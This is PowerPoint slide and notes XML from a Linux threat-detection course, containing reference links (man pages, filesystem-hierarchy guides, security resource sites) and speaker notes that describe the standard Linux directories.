          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="87221" tIns="42845" rIns="87221" bIns="42845" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master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Rectangle 139"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="546383" y="466482"/>
            <a:ext cx="5869173" cy="355112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="65000"/>
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="87209" tIns="42840" rIns="87209" bIns="42840">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="880547">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CWU918KD, Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Detection: Linux Environment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3067871434"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:notesStyle>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="300"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="300"/>
      </a:spcAft>
      <a:defRPr sz="1400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="300"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="300"/>
      </a:spcAft>
      <a:defRPr sz="1400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="300"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="300"/>
      </a:spcAft>
      <a:defRPr sz="1400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="685800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="300"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="300"/>
      </a:spcAft>
      <a:defRPr sz="1400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="300"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="300"/>
      </a:spcAft>
      <a:defRPr sz="1400" b="1"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tldp.org/LDP/Linux-Filesystem-Hierarchy/html/proc.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webcache.googleusercontent.com/search?q=cache:9Y3UERsFtr4J:https://blog.darknedgy.net/technology/2020/05/02/0/+&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man1/scp.1.html"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s://man7.org/linux/man-pages/man1/man.1.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://external-preview.redd.it/7RAuQTNzx2reELa7htdPehSIEHMjks--CXEa7KKqRJA.png?auto=webp&amp;s=9559ade022fb05a9b77f6f6c02e3980f137c2a17" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tldp.org/LDP/Linux-Filesystem-Hierarchy/html/"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hub.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md"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www.qubes-os.org/intro/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unix.stackexchange.com/questions/175345/difference-between-run-and-var-run" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/"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Print instructions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#10 Years </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>systemD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://webcache.googleusercontent.com/search?q=cache:9Y3UERsFtr4J:https://blog.darknedgy.net/technology/2020/05/02/0/+&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#LFH:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://tldp.org/LDP/Linux-Filesystem-Hierarchy/html/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#distros:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://external-preview.redd.it/7RAuQTNzx2reELa7htdPehSIEHMjks--CXEa7KKqRJA.png?auto=webp&amp;s=9559ade022fb05a9b77f6f6c02e3980f137c2a17</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#man:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://man7.org/linux/man-pages/man1/man.1.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://man7.org/linux/man-pages/man1/scp.1.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>tldp.org/LDP/Linux-Filesystem-Hierarchy/html/proc.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Links continued on next page).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2762957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49101" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556816" y="944562"/>
            <a:ext cx="5888736" cy="7998715"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Good pull up for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>history/example of LFH </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>changes/drama: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://lists.fedoraproject.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pipermail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>devel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2011-March/150031.html.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is the second graphic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will be referenced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>throughout </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>this lesson, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lesson will cover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>them all briefly now, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>will selectively dive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into a few specific areas. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bin: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All the executable binary programs (file) required during booting, repairing, files required to run into single-user-mode, and other important, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>basic commands viz., cat, du, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, tar, rpm, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, history, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>boot: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Holds important files during boot-up process, including Linux Kernel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dev: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains device files for all the hardware devices on the machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cdrom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>application’s configuration files, startup, shutdown, start, stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> script for every individual program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>home: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Home directory of the users. Every time a new user is created, a directory in the name of user is created within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the home </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directory which contains other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>directories like Desktop, Downloads, Documents, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lib: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Lib directory contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>modules and shared library images required to boot the system and run commands in root file system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is installed during installation of Linux, useful for recovering files which may be broken due to unexpected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Notes continued on next page).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1055117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556816" y="893135"/>
            <a:ext cx="5888736" cy="7665577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Notes continued from previous page).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/media: Temporary mount directory is created for removable devices viz., media/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cdrom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Temporary mount directory for mounting file system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>opt: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Optional is abbreviated as opt. Contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>third-party </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>application software. Viz., Java, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A virtual and pseudo file-system which contains information about running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>processes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with a particular p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rocess-id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(aka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>root: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the home directory of root user and should never be confused with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘/’.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>run: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This directory is the only clean solution for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>early-runtime-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> problem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains binary executable programs, required by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>system administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>maintenance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Viz., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fdisk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>swapon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, reboot, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>srv</a:t>
            </a:r>
